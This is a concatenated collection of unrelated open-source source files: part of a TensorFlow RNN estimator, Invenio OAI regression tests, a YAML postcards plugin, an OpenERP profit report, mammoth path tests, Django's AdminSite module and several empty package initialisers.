name = 'MultiValueDynamicRNN'
elif prediction_type == rnn_common.PredictionType.SINGLE_VALUE:
name = 'SingleValueDynamicRNN'
else:
raise ValueError(
'prediction_type must be one of PredictionType.MULTIPLE_VALUE or '
'PredictionType.SINGLE_VALUE; got {}'.format(prediction_type))
if problem_type == constants.ProblemType.LINEAR_REGRESSION:
name += 'Regressor'
target_column = layers.regression_target()
elif problem_type == constants.ProblemType.CLASSIFICATION:
if not num_classes:
raise ValueError('For CLASSIFICATION problem_type, num_classes must be '
'specified.')
target_column = layers.multi_class_target(n_classes=num_classes)
name += 'Classifier'
else:
raise ValueError(
'problem_type must be either ProblemType.LINEAR_REGRESSION '
'or ProblemType.CLASSIFICATION; got {}'.format(
problem_type))
if optimizer == 'Momentum':
optimizer = momentum_opt.MomentumOptimizer(learning_rate, momentum)
dynamic_rnn_model_fn = _get_dynamic_rnn_model_fn(
cell_type=cell_type,
num_units=num_units,
target_column=target_column,
problem_type=problem_type,
prediction_type=prediction_type,
optimizer=optimizer,
sequence_feature_columns=sequence_feature_columns,
context_feature_columns=context_feature_columns,
predict_probabilities=predict_probabilities,
learning_rate=learning_rate,
gradient_clipping_norm=gradient_clipping_norm,
dropout_keep_probabilities=dropout_keep_probabilities,
name=name)
super(DynamicRnnEstimator, self).__init__(
model_fn=dynamic_rnn_model_fn,
model_dir=model_dir,
config=config,
feature_engineering_fn=feature_engineering_fn)
|
cul-it/Invenio | refs/heads/master | modules/bibharvest/lib/oai_repository_regression_tests.py | 3 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""OAI Repository Regression Test Suite."""
__revision__ = "$Id$"
import unittest
import time
import re
from cStringIO import StringIO
from invenio.config import CFG_SITE_URL, \
CFG_OAI_SLEEP, \
CFG_OAI_LOAD, \
CFG_OAI_ID_FIELD
from invenio.intbitset import intbitset
from invenio import oai_repository_server, search_engine
from invenio.testutils import make_test_suite, run_test_suite, \
test_web_page_content, merge_error_messages
class OAIRepositoryWebPagesAvailabilityTest(unittest.TestCase):
"""Check OAI Repository web pages whether they are up or not."""
def test_oai_server_pages_availability(self):
"""oairepository - availability of OAI server pages"""
baseurl = CFG_SITE_URL + '/oai2d'
_exports = [#fast commands first:
'?verb=Identify',
'?verb=ListMetadataFormats',
# sleepy commands now:
'?verb=ListSets',
'?verb=ListRecords',
'?verb=GetRecord']
error_messages = []
for url in [baseurl + page for page in _exports]:
if url.endswith('Identify') or \
url.endswith('ListMetadataFormats'):
pass
else:
# some sleep required for verbs other than Identify
# and ListMetadataFormats, since oai2d refuses too
# frequent access:
time.sleep(CFG_OAI_SLEEP)
error_messages.extend(test_web_page_content(url,
expected_text=
'</OAI-PMH>'))
if error_messages:
self.fail(merge_error_messages(error_messages))
return
class TestSelectiveHarvesting(unittest.TestCase):
"""Test set, from and until parameters used to do selective harvesting."""
def test_set(self):
"""oairepository - testing selective harvesting with 'set' parameter"""
self.assertEqual(intbitset([10, 17]), oai_repository_server.oai_get_recid_list(set_spec="cern:experiment"))
self.assert_("Multifractal analysis of minimum bias events" in \
''.join([oai_repository_server.print_record(recID) for recID in \
oai_repository_server.oai_get_recid_list(set_spec="cern:experiment")]))
self.assert_("Multifractal analysis of minimum bias events" not in \
''.join([oai_repository_server.print_record(recID) for recID in \
oai_repository_server.oai_get_recid_list(set_spec="cern:theory")]))
self.failIf(oai_repository_server.oai_get_recid_list(set_spec="nonExistingSet"))
def test_from_and_until(self):
"""oairepository - testing selective harvesting with 'from' and 'until' parameters"""
req = StringIO()
# List available records, get datestamps and play with them
oai_repository_server.oai_list_records_or_identifiers(req, {'verb': 'ListIdentifiers', 'metadataPrefix': 'marcxml'})
identifiers = req.getvalue()
datestamps = re.findall('<identifier>(?P<id>.*?)</identifier>\s*<datestamp>(?P<date>.*?)</datestamp>', identifiers, re.M)
sample_datestamp = datestamps[0][1] # Take one datestamp
sample_oai_id = datestamps[0][0] # Take corresponding oai id
sample_id = search_engine.perform_request_search(p=sample_oai_id,
f=CFG_OAI_ID_FIELD)[0] # Find corresponding system number id
# There must be some datestamps
self.assertNotEqual([], datestamps)
# We must be able to retrieve an id with the date we have just found
self.assert_(sample_id in oai_repository_server.oai_get_recid_list(fromdate=sample_datestamp))
self.assert_(sample_id in oai_repository_server.oai_get_recid_list(untildate=sample_datestamp))
self.assert_(sample_id in oai_repository_server.oai_get_recid_list(untildate=sample_datestamp, \
fromdate=sample_datestamp))
# Same, with short format date. Eg 2007-12-13
self.assert_(sample_id in oai_repository_server.oai_get_recid_list(fromdate=sample_datestamp.split('T')[0]))
self.assert_(sample_id in oai_repository_server.oai_get_recid_list(untildate=sample_datestamp.split('T')[0]))
self.assert_(sample_id in oai_repository_server.oai_get_recid_list(fromdate=sample_datestamp.split('T')[0], \
untildate=sample_datestamp.split('T')[0]))
# At later date (year after) we should not find our id again
sample_datestamp_year = int(sample_datestamp[0:4])
sample_datestamp_rest = sample_datestamp[4:]
later_datestamp = str(sample_datestamp_year + 1) + sample_datestamp_rest
self.assert_(sample_id not in oai_repository_server.oai_get_recid_list(fromdate=later_datestamp))
# At earlier date (year before) we should not find our id again
earlier_datestamp = str(sample_datestamp_year - 1) + sample_datestamp_rest
self.assert_(sample_id not in oai_repository_server.oai_get_recid_list(untildate=earlier_datestamp))
# From earliest date to latest date must include all oai records
dates = [(time.mktime(time.strptime(date[1], "%Y-%m-%dT%H:%M:%SZ")), date[1]) for date in datestamps]
dates = dict(dates)
sorted_times = dates.keys()
sorted_times.sort()
earliest_datestamp = dates[sorted_times[0]]
latest_datestamp = dates[sorted_times[-1]]
self.assertEqual(oai_repository_server.oai_get_recid_list(), \
oai_repository_server.oai_get_recid_list(fromdate=earliest_datestamp, \
untildate=latest_datestamp))
def test_resumption_token(self):
"""oairepository - testing harvesting with bad resumption token"""
# Non existing resumptionToken
req = StringIO()
oai_repository_server.oai_list_records_or_identifiers(req, {'resumptionToken': 'foobar', 'verb': 'ListRecords'})
self.assert_('badResumptionToken' in req.getvalue())
class TestPerformance(unittest.TestCase):
"""Test performance of the repository """
def setUp(self):
"""Setting up some variables"""
# Determine how many records are served
self.number_of_records = len(oai_repository_server.oai_get_recid_list("", "", ""))
if CFG_OAI_LOAD < self.number_of_records:
self.number_of_records = CFG_OAI_LOAD
def test_response_speed_oai(self):
"""oairepository - speed of response for oai_dc output"""
allowed_seconds_per_record_oai = 0.02
# Test oai ListRecords performance
t0 = time.time()
oai_repository_server.oai_list_records_or_identifiers(StringIO(), {'metadataPrefix': 'oai_dc', 'verb': 'ListRecords'})
t = time.time() - t0
if t > self.number_of_records * allowed_seconds_per_record_oai:
self.fail("""Response for ListRecords with metadataPrefix=oai_dc took too much time:
%s seconds.
Limit: %s seconds""" % (t, self.number_of_records * allowed_seconds_per_record_oai))
def test_response_speed_marcxml(self):
"""oairepository - speed of response for marcxml output"""
allowed_seconds_per_record_marcxml = 0.05
# Test marcxml ListRecords performance
t0 = time.time()
oai_repository_server.oai_list_records_or_identifiers(StringIO(), argd={'metadataPrefix': 'marcxml', 'verb': 'ListRecords'})
t = time.time() - t0
if t > self.number_of_records * allowed_seconds_per_record_marcxml:
self.fail("""Response for ListRecords with metadataPrefix=marcxml took too much time:\n
%s seconds.
Limit: %s seconds""" % (t, self.number_of_records * allowed_seconds_per_record_marcxml))
TEST_SUITE = make_test_suite(OAIRepositoryWebPagesAvailabilityTest,
TestSelectiveHarvesting,
TestPerformance)
if __name__ == "__main__":
run_test_suite(TEST_SUITE, warn_user=True)
|
hastexo/edx-platform | refs/heads/master | openedx/core/djangoapps/debug/__init__.py | 12133432 | |
spectrumone/online-shop-template | refs/heads/master | myshop/coupons/migrations/__init__.py | 12133432 | |
LethusTI/supportcenter | refs/heads/master | vendor/django/tests/regressiontests/null_fk_ordering/__init__.py | 12133432 | |
nirmeshk/oh-mainline | refs/heads/master | vendor/packages/Django/tests/modeltests/raw_query/__init__.py | 12133432 | |
abertschi/postcards | refs/heads/master | postcards/plugin_folder_yaml/postcards_folder_yaml.py | 1 | #!/usr/bin/env python
# encoding: utf-8
from postcards.plugin_folder.postcards_folder import PostcardsFolder
import sys
import random
import ntpath
import os
import yaml
class PostcardsFolderYaml(PostcardsFolder):
"""
Send postcards with images from a yaml config
"""
def can_handle_command(self, command):
return True if command in ['validate'] else False
def handle_command(self, command, args):
if command == 'validate':
config = self._read_json_file(args.config_file[0], 'config')
payload = config.get('payload')
if not payload:
self.logger.warn("error: config file does not contain payload")
exit(-1)
folder_path, yaml_path = self._validate_cli(payload, args)
doc = self.validate_and_parse_yaml(folder_path, yaml_path)
for d in doc:
self.logger.info("> entry: {}".format(d))
self.logger.info("validation is successful")
def build_plugin_subparser(self, subparsers):
parser = subparsers.add_parser('validate', help='validate yaml file',
description='check that yaml file contains the proper format ' +
'and that all pictures referenced exist.')
parser.add_argument('-c', '--config',
nargs=1,
required=True,
type=str,
help='location to the configuration file (default: ./config.json)',
default=[os.path.join(os.getcwd(), 'config.json')],
dest='config_file')
def get_img_and_text(self, payload, cli_args):
folder_path, yaml_path = self._validate_cli(payload, cli_args)
document = self.validate_and_parse_yaml(folder_path, yaml_path)
if len(document) == 0:
self.logger.warn("nothing left to do, no more pictures in yaml file left.")
exit(1)
remove_yaml = payload.get("remove_yaml")
if remove_yaml in [True, None]:
text = document.pop(0)
img_name = document.pop(0)
else:
self.logger.info("remove_yaml = False, do not remove entries form yaml")
text = document[0]
img_name = document[1]
img_path = os.path.join(folder_path, img_name)
self._write_back_yaml(document, yaml_path)
move_info = 'moving to sent directory' if payload.get('move') else 'no move'
self.logger.info('choosing image \'{}\' ({})'.format(img_path, move_info))
self.logger.info('choosing text \'{}\''.format(text))
file = open(img_path, 'rb')
if payload.get('move'):
self._move_to_sent(folder_path, img_path)
return {
'img': file,
'text': text
}
def validate_and_parse_yaml(self, folder_path, yaml_path):
"""
both paths are absolute
:return: nothing, fails on invalidity
"""
data = ''
try:
f = open(yaml_path, 'r')
data = f.read()
f.close()
except Exception as e:
self.logger.error("error: can not read yaml file {}".format(yaml_path))
exit(-1)
document = None
self.logger.info("reading yaml file at {}".format(yaml_path))
try:
document = yaml.load(data, Loader=yaml.FullLoader)
except Exception as e:
self.logger.error("error: can not parse yaml file {}".format(yaml_path))
exit(-2)
pass
if len(document) % 2 != 0:
self.logger.error("error: uneven number of entries in yaml file.")
exit(-3)
i = 1
while i < len(document):
img_path = document[i]
img_abs_path = os.path.join(folder_path, img_path)
if not os.path.isfile(img_abs_path):
self.logger.error(
"error: path entry {}: '{}' in yaml file does not exist on disk..".format(i, img_abs_path))
exit(-4)
i = i + 2
return document
def _validate_cli(self, payload, cli_args):
if not payload.get('folder'):
self.logger.error("no folder set in configuration")
exit(1)
folder_location = self._make_absolute_path(payload.get('folder'))
if not os.path.isdir(folder_location):
self.logger.error("picture directory '{}' does not exist".format(folder_location))
exit(1)
if not payload.get('yaml'):
self.logger.error("no yaml file set in configuration")
exit(1)
yaml_location = self._make_absolute_path(payload.get('yaml'))
if not os.path.isfile(yaml_location):
self.logger.error("yaml file {} does not exist".format(yaml_location))
exit(1)
self.logger.debug("cli validation successful")
return folder_location, yaml_location
def _write_back_yaml(self, document, location):
dump = yaml.dump(document)
file = open(location, "w")
file.write(dump)
file.close()
def main():
PostcardsFolderYaml().main(sys.argv[1:])
# def _tmp():
# cards = PostcardsFolderYaml()
# yaml = os.path.join(os.getcwd(), '../../tmp/test.yaml')
# pic_path = os.path.join(os.getcwd(), '../../tmp')
#
# cards.validate_and_parse_yaml(pic_path, yaml)
if __name__ == '__main__':
main()
|
hbrunn/OpenUpgrade | refs/heads/master | addons/hr_timesheet_invoice/report/account_analytic_profit.py | 96 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.report import report_sxw
from openerp.osv import osv
class account_analytic_profit(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(account_analytic_profit, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'lines': self._lines,
'user_ids': self._user_ids,
'journal_ids': self._journal_ids,
'line': self._line,
})
def _user_ids(self, lines):
user_obj = self.pool['res.users']
ids=list(set([b.user_id.id for b in lines]))
return user_obj.browse(self.cr, self.uid, ids)
def _journal_ids(self, form, user_id):
line_obj = self.pool['account.analytic.line']
journal_obj = self.pool['account.analytic.journal']
line_ids=line_obj.search(self.cr, self.uid, [
('date', '>=', form['date_from']),
('date', '<=', form['date_to']),
('journal_id', 'in', form['journal_ids'][0][2]),
('user_id', '=', user_id),
])
ids=list(set([b.journal_id.id for b in line_obj.browse(self.cr, self.uid, line_ids)]))
return journal_obj.browse(self.cr, self.uid, ids)
def _line(self, form, journal_ids, user_ids):
line_obj = self.pool['account.analytic.line']
product_obj = self.pool['product.product']
price_obj = self.pool['product.pricelist']
ids=line_obj.search(self.cr, self.uid, [
('date', '>=', form['date_from']),
('date', '<=', form['date_to']),
('journal_id', 'in', journal_ids),
('user_id', 'in', user_ids),
])
res={}
for line in line_obj.browse(self.cr, self.uid, ids):
if line.account_id.pricelist_id:
if line.account_id.to_invoice:
if line.to_invoice:
id=line.to_invoice.id
name=line.to_invoice.name
discount=line.to_invoice.factor
else:
name="/"
discount=1.0
id = -1
else:
name="Fixed"
discount=0.0
id=0
pl=line.account_id.pricelist_id.id
price=price_obj.price_get(self.cr, self.uid, [pl], line.product_id.id, line.unit_amount or 1.0, line.account_id.partner_id.id)[pl]
else:
name="/"
discount=1.0
id = -1
price=0.0
if id not in res:
res[id]={'name': name, 'amount': 0, 'cost':0, 'unit_amount':0,'amount_th':0}
xxx = round(price * line.unit_amount * (1-(discount or 0.0)), 2)
res[id]['amount_th']+=xxx
if line.invoice_id:
self.cr.execute('select id from account_analytic_line where invoice_id=%s', (line.invoice_id.id,))
tot = 0
for lid in self.cr.fetchall():
lid2 = line_obj.browse(self.cr, self.uid, lid[0])
pl=lid2.account_id.pricelist_id.id
price=price_obj.price_get(self.cr, self.uid, [pl], lid2.product_id.id, lid2.unit_amount or 1.0, lid2.account_id.partner_id.id)[pl]
tot += price * lid2.unit_amount * (1-(discount or 0.0))
if tot:
procent = line.invoice_id.amount_untaxed / tot
res[id]['amount'] += xxx * procent
else:
res[id]['amount'] += xxx
else:
res[id]['amount'] += xxx
res[id]['cost']+=line.amount
res[id]['unit_amount']+=line.unit_amount
for id in res:
res[id]['profit']=res[id]['amount']+res[id]['cost']
res[id]['eff']=res[id]['cost'] and '%d' % (-res[id]['amount'] / res[id]['cost'] * 100,) or 0.0
return res.values()
def _lines(self, form):
line_obj = self.pool['account.analytic.line']
ids=line_obj.search(self.cr, self.uid, [
('date', '>=', form['date_from']),
('date', '<=', form['date_to']),
('journal_id', 'in', form['journal_ids'][0][2]),
('user_id', 'in', form['employee_ids'][0][2]),
])
return line_obj.browse(self.cr, self.uid, ids)
class report_account_analytic_profit(osv.AbstractModel):
_name = 'report.hr_timesheet_invoice.report_analyticprofit'
_inherit = 'report.abstract_report'
_template = 'hr_timesheet_invoice.report_analyticprofit'
_wrapped_report_class = account_analytic_profit
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
mwilliamson/python-mammoth | refs/heads/master | tests/zips_tests.py | 1 | from nose.tools import istest, assert_equal
from mammoth import zips
@istest
def split_path_splits_zip_paths_on_last_forward_slash():
assert_equal(("a", "b"), zips.split_path("a/b"))
assert_equal(("a/b", "c"), zips.split_path("a/b/c"))
assert_equal(("/a/b", "c"), zips.split_path("/a/b/c"))
@istest
def when_path_has_no_forward_slashes_then_split_path_returns_empty_dirname():
assert_equal(("", "name"), zips.split_path("name"))
@istest
def join_path_joins_arguments_with_forward_slashes():
assert_equal("a/b", zips.join_path("a", "b"))
assert_equal("a/b/c", zips.join_path("a/b", "c"))
assert_equal("/a/b/c", zips.join_path("/a/b", "c"))
@istest
def empty_parts_are_ignored_when_joining_paths():
assert_equal("a", zips.join_path("a", ""))
assert_equal("b", zips.join_path("", "b"))
assert_equal("a/b", zips.join_path("a", "", "b"))
@istest
def when_joining_paths_then_absolute_paths_ignore_earlier_paths():
assert_equal("/b", zips.join_path("a", "/b"))
assert_equal("/b/c", zips.join_path("a", "/b", "c"))
assert_equal("/b", zips.join_path("/a", "/b"))
assert_equal("/a", zips.join_path("/a"))
|
krisys/django | refs/heads/master | django/contrib/admin/sites.py | 3 | from functools import update_wrapper
from django.apps import apps
from django.conf import settings
from django.contrib.admin import ModelAdmin, actions
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models.base import ModelBase
from django.http import Http404, HttpResponseRedirect
from django.template.response import TemplateResponse
from django.urls import NoReverseMatch, reverse
from django.utils import six
from django.utils.text import capfirst
from django.utils.translation import ugettext as _, ugettext_lazy
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.i18n import JavaScriptCatalog
system_check_errors = []
class AlreadyRegistered(Exception):
pass
class NotRegistered(Exception):
pass
class AdminSite(object):
"""
An AdminSite object encapsulates an instance of the Django admin application, ready
to be hooked in to your URLconf. Models are registered with the AdminSite using the
register() method, and the get_urls() method can then be used to access Django view
functions that present a full admin interface for the collection of registered
models.
"""
# Text to put at the end of each page's <title>.
site_title = ugettext_lazy('Django site admin')
# Text to put in each page's <h1>.
site_header = ugettext_lazy('Django administration')
# Text to put at the top of the admin index page.
index_title = ugettext_lazy('Site administration')
# URL for the "View site" link at the top of each admin page.
site_url = '/'
_empty_value_display = '-'
login_form = None
index_template = None
app_index_template = None
login_template = None
logout_template = None
password_change_template = None
password_change_done_template = None
def __init__(self, name='admin'):
self._registry = {} # model_class class -> admin_class instance
self.name = name
self._actions = {'delete_selected': actions.delete_selected}
self._global_actions = self._actions.copy()
def register(self, model_or_iterable, admin_class=None, **options):
"""
Registers the given model(s) with the given admin class.
The model(s) should be Model classes, not instances.
If an admin class isn't given, it will use ModelAdmin (the default
admin options). If keyword arguments are given -- e.g., list_display --
they'll be applied as options to the admin class.
If a model is already registered, this will raise AlreadyRegistered.
If a model is abstract, this will raise ImproperlyConfigured.
"""
if not admin_class:
admin_class = ModelAdmin
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model._meta.abstract:
raise ImproperlyConfigured(
'The model %s is abstract, so it cannot be registered with admin.' % model.__name__
)
if model in self._registry:
raise AlreadyRegistered('The model %s is already registered' % model.__name__)
# Ignore the registration if the model has been
# swapped out.
if not model._meta.swapped:
# If we got **options then dynamically construct a subclass of
# admin_class with those **options.
if options:
# For reasons I don't quite understand, without a __module__
# the created class appears to "live" in the wrong place,
# which causes issues later on.
options['__module__'] = __name__
admin_class = type("%sAdmin" % model.__name__, (admin_class,), options)
# Instantiate the admin class to save in the registry
admin_obj = admin_class(model, self)
if admin_class is not ModelAdmin and settings.DEBUG:
system_check_errors.extend(admin_obj.check())
self._registry[model] = admin_obj
def unregister(self, model_or_iterable):
"""
Unregisters the given model(s).
If a model isn't already registered, this will raise NotRegistered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
def is_registered(self, model):
"""
Check if a model class is registered with this `AdminSite`.
"""
return model in self._registry
def add_action(self, action, name=None):
"""
Register an action to be available globally.
"""
name = name or action.__name__
self._actions[name] = action
self._global_actions[name] = action
def disable_action(self, name):
"""
Disable a globally-registered action. Raises KeyError for invalid names.
"""
del self._actions[name]
def get_action(self, name):
"""
Explicitly get a registered global action whether it's enabled or
not. Raises KeyError for invalid names.
"""
return self._global_actions[name]
@property
def actions(self):
"""
Get all the enabled actions as an iterable of (name, func).
"""
return six.iteritems(self._actions)
@property
def empty_value_display(self):
return self._empty_value_display
@empty_value_display.setter
def empty_value_display(self, empty_value_display):
self._empty_value_display = empty_value_display
def has_permission(self, request):
"""
Returns True if the given HttpRequest has permission to view
*at least one* page in the admin site.
"""
return request.user.is_active and request.user.is_staff
def admin_view(self, view, cacheable=False):
"""
Decorator to create an admin view attached to this ``AdminSite``. This
wraps the view and provides permission checking by calling
``self.has_permission``.
You'll want to use this from within ``AdminSite.get_urls()``:
class MyAdminSite(AdminSite):
def get_urls(self):
from django.conf.urls import url
urls = super(MyAdminSite, self).get_urls()
urls += [
url(r'^my_view/$', self.admin_view(some_view))
]
return urls
By default, admin_views are marked non-cacheable using the
``never_cache`` decorator. If the view can be safely cached, set
cacheable=True.
"""
def inner(request, *args, **kwargs):
if not self.has_permission(request):
if request.path == reverse('admin:logout', current_app=self.name):
index_path = reverse('admin:index', current_app=self.name)
return HttpResponseRedirect(index_path)
# Inner import to prevent django.contrib.admin (app) from
# importing django.contrib.auth.models.User (unrelated model).
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
request.get_full_path(),
reverse('admin:login', current_app=self.name)
)
return view(request, *args, **kwargs)
if not cacheable:
inner = never_cache(inner)
# We add csrf_protect here so this function can be used as a utility
# function for any view, without having to repeat 'csrf_protect'.
if not getattr(view, 'csrf_exempt', False):
inner = csrf_protect(inner)
return update_wrapper(inner, view)
def get_urls(self):
from django.conf.urls import url, include
# Since this module gets imported in the application's root package,
# it cannot import models from other applications at the module level,
# and django.contrib.contenttypes.views imports ContentType.
from django.contrib.contenttypes import views as contenttype_views
def wrap(view, cacheable=False):
def wrapper(*args, **kwargs):
return self.admin_view(view, cacheable)(*args, **kwargs)
wrapper.admin_site = self
return update_wrapper(wrapper, view)
# Admin-site-wide views.
urlpatterns = [
url(r'^$', wrap(self.index), name='index'),
url(r'^login/$', self.login, name='login'),
url(r'^logout/$', wrap(self.logout), name='logout'),
url(r'^password_change/$', wrap(self.password_change, cacheable=True), name='password_change'),
url(r'^password_change/done/$', wrap(self.password_change_done, cacheable=True),
name='password_change_done'),
url(r'^jsi18n/$', wrap(self.i18n_javascript, cacheable=True), name='jsi18n'),
url(r'^r/(?P<content_type_id>\d+)/(?P<object_id>.+)/$', wrap(contenttype_views.shortcut),
name='view_on_site'),
]
# Add in each model's views, and create a list of valid URLS for the
# app_index
valid_app_labels = []
for model, model_admin in self._registry.items():
urlpatterns += [
url(r'^%s/%s/' % (model._meta.app_label, model._meta.model_name), include(model_admin.urls)),
]
if model._meta.app_label not in valid_app_labels:
valid_app_labels.append(model._meta.app_label)
# If there were ModelAdmins registered, we should have a list of app
# labels for which we need to allow access to the app_index view,
if valid_app_labels:
regex = r'^(?P<app_label>' + '|'.join(valid_app_labels) + ')/$'
urlpatterns += [
url(regex, wrap(self.app_index), name='app_list'),
]
return urlpatterns
@property
def urls(self):
return self.get_urls(), 'admin', self.name
def each_context(self, request):
"""
Returns a dictionary of variables to put in the template context for
*every* page in the admin site.
For sites running on a subpath, use the SCRIPT_NAME value if site_url
hasn't been customized.
"""
script_name = request.META['SCRIPT_NAME']
site_url = script_name if self.site_url == '/' and script_name else self.site_url
return {
'site_title': self.site_title,
'site_header': self.site_header,
'site_url': site_url,
'has_permission': self.has_permission(request),
'available_apps': self.get_app_list(request),
}
def password_change(self, request, extra_context=None):
"""
Handles the "change password" task -- both form display and validation.
"""
from django.contrib.admin.forms import AdminPasswordChangeForm
from django.contrib.auth.views import password_change
url = reverse('admin:password_change_done', current_app=self.name)
defaults = {
'password_change_form': AdminPasswordChangeForm,
'post_change_redirect': url,
'extra_context': dict(self.each_context(request), **(extra_context or {})),
}
if self.password_change_template is not None:
defaults['template_name'] = self.password_change_template
request.current_app = self.name
return password_change(request, **defaults)
def password_change_done(self, request, extra_context=None):
"""
Displays the "success" page after a password change.
"""
from django.contrib.auth.views import password_change_done
defaults = {
'extra_context': dict(self.each_context(request), **(extra_context or {})),
}
if self.password_change_done_template is not None:
defaults['template_name'] = self.password_change_done_template
request.current_app = self.name
return password_change_done(request, **defaults)
def i18n_javascript(self, request):
"""
Displays the i18n JavaScript that the Django admin requires.
"""
return JavaScriptCatalog.as_view(packages=['django.contrib.admin'])(request)
@never_cache
def logout(self, request, extra_context=None):
"""
Logs out the user for the given HttpRequest.
This should *not* assume the user is already logged in.
"""
from django.contrib.auth.views import logout
defaults = {
'extra_context': dict(
self.each_context(request),
# Since the user isn't logged out at this point, the value of
# has_permission must be overridden.
has_permission=False,
**(extra_context or {})
),
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
request.current_app = self.name
return logout(request, **defaults)
@never_cache
def login(self, request, extra_context=None):
"""
Displays the login form for the given HttpRequest.
"""
if request.method == 'GET' and self.has_permission(request):
# Already logged-in, redirect to admin index
index_path = reverse('admin:index', current_app=self.name)
return HttpResponseRedirect(index_path)
from django.contrib.auth.views import login
# Since this module gets imported in the application's root package,
# it cannot import models from other applications at the module level,
# and django.contrib.admin.forms eventually imports User.
from django.contrib.admin.forms import AdminAuthenticationForm
context = dict(
self.each_context(request),
title=_('Log in'),
app_path=request.get_full_path(),
)
if (REDIRECT_FIELD_NAME not in request.GET and
REDIRECT_FIELD_NAME not in request.POST):
context[REDIRECT_FIELD_NAME] = reverse('admin:index', current_app=self.name)
context.update(extra_context or {})
defaults = {
'extra_context': context,
'authentication_form': self.login_form or AdminAuthenticationForm,
'template_name': self.login_template or 'admin/login.html',
}
request.current_app = self.name
return login(request, **defaults)
def _build_app_dict(self, request, label=None):
"""
Builds the app dictionary. Takes an optional label parameters to filter
models of a specific app.
"""
app_dict = {}
if label:
models = {
m: m_a for m, m_a in self._registry.items()
if m._meta.app_label == label
}
else:
models = self._registry
for model, model_admin in models.items():
app_label = model._meta.app_label
has_module_perms = model_admin.has_module_permission(request)
if not has_module_perms:
if label:
raise PermissionDenied
continue
perms = model_admin.get_model_perms(request)
# Check whether user has any perm for this module.
# If so, add the module to the model_list.
if True not in perms.values():
continue
info = (app_label, model._meta.model_name)
model_dict = {
'name': capfirst(model._meta.verbose_name_plural),
'object_name': model._meta.object_name,
'perms': perms,
}
if perms.get('change'):
try:
model_dict['admin_url'] = reverse('admin:%s_%s_changelist' % info, current_app=self.name)
except NoReverseMatch:
pass
if perms.get('add'):
try:
model_dict['add_url'] = reverse('admin:%s_%s_add' % info, current_app=self.name)
except NoReverseMatch:
pass
if app_label in app_dict:
app_dict[app_label]['models'].append(model_dict)
else:
app_dict[app_label] = {
'name': apps.get_app_config(app_label).verbose_name,
'app_label': app_label,
'app_url': reverse(
'admin:app_list',
kwargs={'app_label': app_label},
current_app=self.name,
),
'has_module_perms': has_module_perms,
'models': [model_dict],
}
if label:
return app_dict.get(label)
return app_dict
def get_app_list(self, request):
"""
Returns a sorted list of all the installed apps that have been
registered in this site.
"""
app_dict = self._build_app_dict(request)
# Sort the apps alphabetically.
app_list = sorted(app_dict.values(), key=lambda x: x['name'].lower())
# Sort the models alphabetically within each app.
for app in app_list:
app['models'].sort(key=lambda x: x['name'])
return app_list
@never_cache
def index(self, request, extra_context=None):
"""
Displays the main admin index page, which lists all of the installed
apps that have been registered in this site.
"""
app_list = self.get_app_list(request)
context = dict(
self.each_context(request),
title=self.index_title,
app_list=app_list,
)
context.update(extra_context or {})
request.current_app = self.name
return TemplateResponse(request, self.index_template or 'admin/index.html', context)
def app_index(self, request, app_label, extra_context=None):
app_dict = self._build_app_dict(request, app_label)
if not app_dict:
raise Http404('The requested admin page does not exist.')
# Sort the models alphabetically within each app.
app_dict['models'].sort(key=lambda x: x['name'])
app_name = apps.get_app_config(app_label).verbose_name
context = dict(
self.each_context(request),
title=_('%(app)s administration') % {'app': app_name},
app_list=[app_dict],
app_label=app_label,
)
context.update(extra_context or {})
request.current_app = self.name
return TemplateResponse(request, self.app_index_template or [
'admin/%s/app_index.html' % app_label,
'admin/app_index.html'
], context)
# This global object represents the default admin site, for the common case.
# You can instantiate AdminSite in your own code to create a custom admin site.
site = AdminSite()
|
wlanslovenija/django-tastypie | refs/heads/master | tastypie/contrib/contenttypes/__init__.py | 12133432 | |
mmalyska/eve-wspace | refs/heads/develop | evewspace/API/management/__init__.py | 12133432 | |
0--key/lib | refs/heads/master | portfolio/2010_Guns/guns/__init__.py | 12133432 | |
yask123/django | refs/heads/master | tests/test_discovery_sample/__init__.py | 12133432 | |
manthey/girder | refs/heads/master | plugins/curation/plugin_tests/__init__.py | 12133432 | |
msebire/intellij-community | refs/heads/master | python/testData/pyi/inspections/hiddenPyiImports/m2.py | 31 | foo = 1
bar = 2
baz = 3
|
AnCh7/sweetshot | refs/heads/master | python3-src/graphenebase/types.py | 1 | from binascii import hexlify, unhexlify
import time
from calendar import timegm
from datetime import datetime
import struct
from collections import OrderedDict
import json
from .objecttypes import object_type
